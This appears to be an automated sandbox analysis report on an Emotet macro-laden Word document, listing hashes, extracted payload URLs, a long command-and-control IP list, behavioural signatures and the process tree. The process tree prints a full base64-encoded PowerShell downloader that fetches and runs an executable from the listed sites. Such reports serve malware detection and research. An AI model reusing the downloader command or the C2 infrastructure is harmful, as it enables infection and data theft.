Analysis
-
max time kernel
26s -
max time network
28s -
platform
windows10_x64 -
resource
win10 -
submitted
14-10-2020 23:01
Static task
static1
General
-
Target
emotet_e1_a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc_2020-10-14__230041998141._doc.doc
-
Size
132KB
-
MD5
40409631a9fb83e1ab8d02c2f8fa216d
-
SHA1
e6b8170c2ca200cb38d26a9ad836bc596d38ba6d
-
SHA256
a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc
-
SHA512
b83ee57533375a8642b71463cbdf27f9ccfdea2d71ed90f21c4bbe4942276c2519446d0c15548d36d985dd9b999be0f946934a8261b5e1a85a8adafc6c89e3ea
Malware Config
Extracted
http://newcarturkiye.com/wp-admin/Sbp/
http://lilianwmina.com/wp-includes/Y/
http://hbmonte.com/wp-content/wer/
http://thewakestudio.com/wp-admin/3D/
http://formedbyme.com/wp-content/3e/
http://unitedway.giving.agency/sys-cache/XnT/
http://partners.ripplealpha.com/data/ultimatemember/L/
Extracted
emotet
Epoch1
188.157.101.114:80
192.175.111.214:8080
95.85.33.23:8080
192.232.229.54:7080
181.30.61.163:443
186.70.127.199:8090
200.127.14.97:80
70.169.17.134:80
24.232.228.233:80
172.104.169.32:8080
50.28.51.143:8080
177.73.0.98:443
149.202.72.142:7080
37.187.161.206:8080
202.29.239.162:443
213.197.182.158:8080
202.134.4.210:7080
190.24.243.186:80
201.213.177.139:80
105.209.235.113:8080
111.67.12.221:8080
83.169.21.32:7080
216.47.196.104:80
77.238.212.227:80
98.13.75.196:80
181.129.96.162:8080
177.144.130.105:443
128.92.203.42:80
87.106.46.107:8080
177.23.7.151:80
12.162.84.2:8080
190.188.245.242:80
178.211.45.66:8080
45.46.37.97:80
104.131.41.185:8080
50.121.220.50:80
46.43.2.95:8080
137.74.106.111:7080
70.32.115.157:8080
51.15.7.189:80
68.183.170.114:8080
1.226.84.243:8080
74.135.120.91:80
68.183.190.199:8080
5.189.178.202:8080
191.182.6.118:80
190.190.219.184:80
212.71.237.140:8080
138.97.60.140:8080
70.32.84.74:8080
192.81.38.31:80
190.115.18.139:8080
12.163.208.58:80
74.58.215.226:80
178.250.54.208:8080
177.74.228.34:80
35.143.99.174:80
51.38.124.206:80
186.103.141.250:443
5.196.35.138:7080
82.76.111.249:443
219.92.13.25:80
185.183.16.47:80
177.144.130.105:8080
62.84.75.50:80
46.105.114.137:8080
51.255.165.160:8080
60.93.23.51:80
51.15.7.145:80
174.118.202.24:443
191.191.23.135:80
51.75.33.127:80
217.13.106.14:8080
152.169.22.67:80
192.241.143.52:8080
170.81.48.2:80
188.135.15.49:80
189.2.177.210:443
5.89.33.136:80
185.94.252.27:443
185.94.252.12:80
177.129.17.170:443
45.33.77.42:8080
209.236.123.42:8080
85.214.26.7:8080
64.201.88.132:80
46.101.58.37:8080
94.176.234.118:443
138.97.60.141:7080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1780 3252 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/976-13-0x0000000000710000-0x000000000072F000-memory.dmp emotet behavioral1/memory/976-14-0x0000000000730000-0x000000000074E000-memory.dmp emotet behavioral1/memory/1644-17-0x0000000002040000-0x000000000205F000-memory.dmp emotet behavioral1/memory/1644-18-0x0000000002060000-0x000000000207E000-memory.dmp emotet -
Blacklisted process makes network request 3 IoCs
Processes:
POwersheLL.exeflow pid process 14 1780 POwersheLL.exe 16 1780 POwersheLL.exe 18 1780 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
V9ofyxp.execredprovslegacy.exepid process 976 V9ofyxp.exe 1644 credprovslegacy.exe -
Drops file in System32 directory 1 IoCs
Processes:
V9ofyxp.exedescription ioc process File opened for modification C:\Windows\SysWOW64\ole2nls\credprovslegacy.exe V9ofyxp.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3612 WINWORD.EXE 3612 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
POwersheLL.execredprovslegacy.exepid process 1780 POwersheLL.exe 1780 POwersheLL.exe 1780 POwersheLL.exe 1644 credprovslegacy.exe 1644 credprovslegacy.exe 1644 credprovslegacy.exe 1644 credprovslegacy.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 1780 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXEV9ofyxp.execredprovslegacy.exepid process 3612 WINWORD.EXE 3612 WINWORD.EXE 3612 WINWORD.EXE 3612 WINWORD.EXE 3612 WINWORD.EXE 3612 WINWORD.EXE 3612 WINWORD.EXE 3612 WINWORD.EXE 3612 WINWORD.EXE 976 V9ofyxp.exe 1644 credprovslegacy.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
POwersheLL.exeV9ofyxp.exedescription pid process target process PID 1780 wrote to memory of 976 1780 POwersheLL.exe V9ofyxp.exe PID 1780 wrote to memory of 976 1780 POwersheLL.exe V9ofyxp.exe PID 1780 wrote to memory of 976 1780 POwersheLL.exe V9ofyxp.exe PID 976 wrote to memory of 1644 976 V9ofyxp.exe credprovslegacy.exe PID 976 wrote to memory of 1644 976 V9ofyxp.exe credprovslegacy.exe PID 976 wrote to memory of 1644 976 V9ofyxp.exe credprovslegacy.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEPID:3612"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc_2020-10-14__230041998141._doc.doc" /o ""Checks processor information in registryEnumerates system info in registrySuspicious behavior: AddClipboardFormatListenerSuspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePID:1780POwersheLL -ENCOD JABPAGMAYQB2AHAAOAAzAD0AWwBjAGgAYQByAF0ANAAyADsAJABVADYAOQBiAGoANAAwAD0AKAAoACcAQgBuACcAKwAnAHoAYgB2ACcAKQArACcAOABsACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAdQBTAEUAcgBwAHIATwBGAGkATABlAFwAQgAyADAARABZAGEAawBcAG8AdgBQAFEASABvADQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIARQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBJAHQAYABZAHAAYABSAE8AVABgAG8AYwBPAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAxADIAJwArACcALAAnACkAKwAnACAAJwArACcAdABsACcAKwAnAHMAMQAnACsAKAAnADEALAAgAHQAbAAnACsAJwBzACcAKQApADsAJABDAHUANgB5AGgAMQB6ACAAPQAgACgAJwBWACcAKwAoACcAOQBvAGYAJwArACcAeQAnACkAKwAnAHgAcAAnACkAOwAkAEgAcQBkAHcAbABqAGkAPQAoACcARwBiACcAKwAoACcANAAnACsAJwB1ADAAMQAnACkAKwAnAHMAJwApADsAJABIAHcAegBxADgAeAAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAAnACsAJwB9AEIAMgAwACcAKwAnAGQAeQAnACsAJwBhACcAKwAnAGsAewAwAH0ATwB2AHAAcQBoAG8ANAB7ADAAfQAnACkAIAAgAC0ARgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKwAkAEMAdQA2AHkAaAAxAHoAKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABVAHQAYgBrAGwAaQA2AD0AKAAnAEcAJwArACgAJwBhAHcAJwArACcAagBhAHkAJwApACsAJwBsACcAKQA7ACQAQQBjAGwAegBiADcANgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgBXAGUAYgBjAEwAaQBFAE4AVAA7ACQAUQB0ADkAYgB3AGUAcQA9ACgAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoAJwArACcALwAnACkAKwAoACcALwBuACcAKwAnAGUAJwApACsAKAAnAHcAJwArACcAYwBhACcAKQArACcAcgAnACsAKAAnAHQAdQByAGsAaQAnACsAJwB5ACcAKwAnAGUALgBjACcAKwAnAG8AbQAvAHcAcAAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwBTAGIAcAAnACsAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAOgAvAC8AJwArACcAbAAnACkAKwAoACcAaQAnACsAJwBsAGkAJwArACcAYQBuAHcAbQBpAG4AYQAuAGMAJwApACsAJwBvACcAKwAnAG0AJwArACgAJwAvAHcAJwArACcAcAAtACcAKQArACcAaQAnACsAKAAnAG4AYwAnACsAJwBsAHUAZABlACcAKQArACgAJwBzAC8AJwArACcAWQAvACcAKwAnACoAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AaABiAG0AJwArACcAbwBuAHQAJwApACsAJwBlACcAKwAnAC4AYwAnACsAJwBvACcAKwAnAG0ALwAnACsAKAAnAHcAcAAnACsAJwAtACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbgAnACsAJwB0AGUAbgB0ACcAKQArACcALwAnACsAJwB3ACcAKwAnAGUAJwArACcAcgAnACsAKAAnAC8AKgAnACsAJwBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHQAJwApACsAKAAnAGgAZQAnACsAJwB3AGEAawAnACsAJwBlAHMAJwApACsAKAAnAHQAdQAnACsAJwBkAGkAJwApACsAJwBvAC4AJwArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AdwAnACsAKAAnAHAAJwArACcALQBhACcAKQArACgAJwBkAG0AJwArACcAaQAnACkAKwAnAG4ALwAnACsAJwAzAEQAJwArACgAJwAvACoAaAB0ACcAKwAnAHQAJwApACsAJwBwADoAJwArACcALwAnACsAJwAvAGYAJwArACcAbwByACcAKwAoACcAbQAnACsAJwBlAGQAYgB5AG0AZQAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwAvAHcAcAAnACsAJwAtAGMAbwBuAHQAJwApACsAKAAnAGUAJwArACcAbgB0ACcAKQArACcALwAzACcAKwAoACcAZQAvACoAaAAnACsAJwB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAvACcAKwAnAC8AdQAnACkAKwAoACcAbgBpAHQAJwArACcAZQAnACkAKwAnAGQAdwAnACsAKAAnAGEAeQAnACsAJwAuACcAKQArACgAJwBnAGkAdgBpACcAKwAnAG4AZwAuACcAKwAnAGEAZwAnACkAKwAoACcAZQBuACcAKwAnAGMAJwApACsAJwB5ACcAKwAnAC8AcwAnACsAJwB5ACcAKwAoACcAcwAtACcAKwAnAGMAYQBjACcAKQArACcAaABlACcAKwAnAC8AJwArACcAWAAnACsAJwBuACcAKwAoACcAVAAnACsAJwAvACcAKwAnACoAaAB0AHQAcAA6ACcAKQArACcALwAvACcAKwAnAHAAJwArACcAYQByACcAKwAoACcAdABuACcAKwAnAGUAcgBzAC4AcgAnACkAKwAoACcAaQBwACcAKwAnAHAAbABlACcAKQArACgAJwBhAGwAcABoACcAKwAnAGEALgBjAG8AJwApACsAKAAnAG0ALwBkACcAKwAnAGEAJwArACcAdABhAC8AJwApACsAKAAnAHUAJwArACcAbAB0AGkAbQAnACkAKwAoACcAYQB0AGUAbQBlAG0AYgAnACsAJwBlACcAKwAnAHIALwBMACcAKQArACcALwAnACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AYwBhAHYAcAA4ADMAKQA7ACQATAA1ADMANQB6AG0AZQA9ACgAKAAnAEQAcwAnACsAJwAzAHUAZQAnACkAKwAnADMAJwArACcAcAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABFADEAMwBqAGUAdwBzACAAaQBuACAAJABRAHQAOQBiAHcAZQBxACkAewB0AHIAeQB7ACQAQQBjAGwAegBiADcANgAuACIAZABgAE8AVwBuAEwAbwBBAGQAYABGAGkAYABMAGUAIgAoACQARQAxADMAagBlAHcAcwAsACAAJABIAHcAegBxADgAeAAxACkAOwAkAEwAZQBtAGYAdgBmADQAPQAoACgAJwBQAHEAbQAnACsAJwBrACcAKQArACcAeAAnACsAJwAwAGcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEgAdwB6AHEAOAB4ADEAKQAuACIAbABlAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADMAMgAwADcANAApACAAewAmACgAJwBJAG4AJwArACcAdgAnACsAJwBvAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABIAHcAegBxADgAeAAxACkAOwAkAFAAZQBlADAAegB2AHEAPQAoACcARwAnACsAKAAnAGYANABxAGsAJwArACcAdABzACcAKQApADsAYgByAGUAYQBrADsAJABNADUANwBsAGcAdwBrAD0AKAAnAFMAJwArACgAJwBpAGoAJwArACcAYQA1ACcAKwAnAGYAZwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQA2AHMAeABrAGYAMgA9ACgAKAAnAFgAMwBsAGEAXwAnACsAJwB3ACcAKQArACcAbAAnACkAProcess spawned unexpected child processBlacklisted process makes network requestSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exePID:976"C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe"Executes dropped EXEDrops file in System32 directorySuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ole2nls\credprovslegacy.exePID:1644"C:\Windows\SysWOW64\ole2nls\credprovslegacy.exe"Executes dropped EXESuspicious behavior: EnumeratesProcessesSuspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Defense Evasion
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Replay Monitor
Downloads
-
C:\Users\Admin\B20DYak\ovPQHo4\V9ofyxp.exeMD5
9df4614f28b9b04ca2e2416d9344289f
SHA170372b65059420f08691667078e8bf3555554ec9
SHA2567b1a3968b858a99720918ec4791ea586d8f9466be36f0defc669189398a6901d
SHA5120466e00ca4eb065f2f19acb895378c4a01efda52fd20d02cc44f7e5fed2929454612897aaedf4866b9d388bba050639c6e39b5b62bd8fa70f399fe5a085497c1
-
C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exeMD5
9df4614f28b9b04ca2e2416d9344289f
SHA170372b65059420f08691667078e8bf3555554ec9
SHA2567b1a3968b858a99720918ec4791ea586d8f9466be36f0defc669189398a6901d
SHA5120466e00ca4eb065f2f19acb895378c4a01efda52fd20d02cc44f7e5fed2929454612897aaedf4866b9d388bba050639c6e39b5b62bd8fa70f399fe5a085497c1
-
C:\Windows\SysWOW64\ole2nls\credprovslegacy.exeMD5
9df4614f28b9b04ca2e2416d9344289f
SHA170372b65059420f08691667078e8bf3555554ec9
SHA2567b1a3968b858a99720918ec4791ea586d8f9466be36f0defc669189398a6901d
SHA5120466e00ca4eb065f2f19acb895378c4a01efda52fd20d02cc44f7e5fed2929454612897aaedf4866b9d388bba050639c6e39b5b62bd8fa70f399fe5a085497c1
-
memory/976-10-0x0000000000000000-mapping.dmp
-
memory/976-14-0x0000000000730000-0x000000000074E000-memory.dmpFilesize
120KB
-
memory/976-13-0x0000000000710000-0x000000000072F000-memory.dmpFilesize
124KB
-
memory/1644-18-0x0000000002060000-0x000000000207E000-memory.dmpFilesize
120KB
-
memory/1644-17-0x0000000002040000-0x000000000205F000-memory.dmpFilesize
124KB
-
memory/1644-15-0x0000000000000000-mapping.dmp
-
memory/1780-8-0x00000185DC9E0000-0x00000185DC9E1000-memory.dmpFilesize
4KB
-
memory/1780-9-0x00000185DCB90000-0x00000185DCB91000-memory.dmpFilesize
4KB
-
memory/1780-7-0x00007FFA14880000-0x00007FFA1526C000-memory.dmpFilesize
9MB
-
memory/3612-0-0x00007FFA1BCF0000-0x00007FFA1C3B6000-memory.dmpFilesize
6MB
-
memory/3612-6-0x000001E3F6BA2000-0x000001E3F6BA7000-memory.dmpFilesize
20KB
-
memory/3612-5-0x000001E3F6BA2000-0x000001E3F6BA7000-memory.dmpFilesize
20KB
-
memory/3612-4-0x000001E3F6BA2000-0x000001E3F6BA7000-memory.dmpFilesize
20KB
-
memory/3612-3-0x000001E3F6BA2000-0x000001E3F6BA7000-memory.dmpFilesize
20KB
-
memory/3612-2-0x000001E3F4376000-0x000001E3F437B000-memory.dmpFilesize
20KB
-
memory/3612-1-0x000001E3F6995000-0x000001E3F699A000-memory.dmpFilesize
20KB